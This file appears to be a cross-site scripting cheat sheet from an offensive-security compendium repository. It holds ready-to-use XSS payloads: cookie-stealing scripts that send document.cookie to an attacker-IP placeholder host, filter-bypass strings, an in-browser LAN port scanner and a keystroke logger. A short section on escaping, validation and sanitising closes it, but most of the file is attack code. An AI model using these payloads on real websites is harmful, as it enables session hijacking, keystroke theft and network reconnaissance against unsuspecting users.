killchain-compendium/exploit/web/xss.md

114 lines
4.1 KiB
Markdown
Raw Normal View History

2021-08-23 01:13:54 +02:00
# Cross-Site Scripting
A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS.
## Stored XSS
This is where a malicious string originates from the websites database.
### Examples
* Sanity test by changing DOM content
```
<script>document.getElementById('myIdName').innerHTML="napf"</script>
```
* Cookie stealing
```
<script>document.location='/log/'+document.cookie</script>
```
* Navigte to `/logs` and take sid
2021-09-13 01:15:06 +02:00
* Open nc port and collect cookies
2021-09-02 01:19:53 +02:00
```sh
<script>document.location='http://<attacker-IP>:<attacker-Port>/XSS/grabber.php?c='+document.cookie</script>
<script>var i=new Image;i.src="http://<attacker-IP>:<attacker-Port>/?"+document.cookie;</script>
```
2021-08-23 01:13:54 +02:00
## Reflected XSS
In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
### Usage
As script inside parameter
```sh
http://example.com/search?keyword=<script>...</script>
```
* Show server IP
```
http://example.com/reflected?keyword=<script>alert(window.location.hostname)</script>
```
## DOM based XSS
With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:
```javascript
var keyword = document.querySelector('#search')
keyword.innerHTML = <script>...</script>
```
### Usage
* Find the sub-object inside the document
```javascript
test" onmouseover="alert('YO!')"
```
* Show cookie
```
test" onmouseover="alert(document.cookie)"
```
## Bypass Filters
* `<script>` sanitizing
```HTML
<img src=x onerror=alert('Hello');>
```
or
```javascript
<</script>script>alert("1")<</script>/script>
```
* `alert()` sanitizing
```javascript
0\"autofocus/onfocus=alert(1)--><onerror=prompt(2)>"-confirm(3)-"
```
or
```javascript
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
```
* Strings, here its `Hello`
```javascript
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>
```
## Portscanner via Javascript
* By requesting the favicon, checking port 80
```javascript
<script>
for (let i = 0; i < 256; i++) {
let ip = '192.168.0.' + i
let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">'
document.body.innerHTML += code
}
</script>
```
* [pdp's portscanner](https://www.gnucitizen.org/files/2006/08/jsportscanner.js)
## Keylogger
```javascript
<script type="text/javascript">
let l = ""; // Variable to store key-strokes in
document.onkeypress = function (e) { // Event to listen for key presses
l += e.key; // If user types, log it to the l variable
console.log(l); // update this line to post to your own server
}
</script>
```
## Protection Methods
There are many ways to prevent XSS, here are the 3 ways to keep cross-site scripting our of your application.
1. Escaping - Escape all user input. This means any data your application has received is secure before rendering it for your end users. By escaping user input, key characters in the data received but the web page will be prevented from being interpreter in any malicious way. For example, you could disallow the < and > characters from being rendered.
2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity &#60;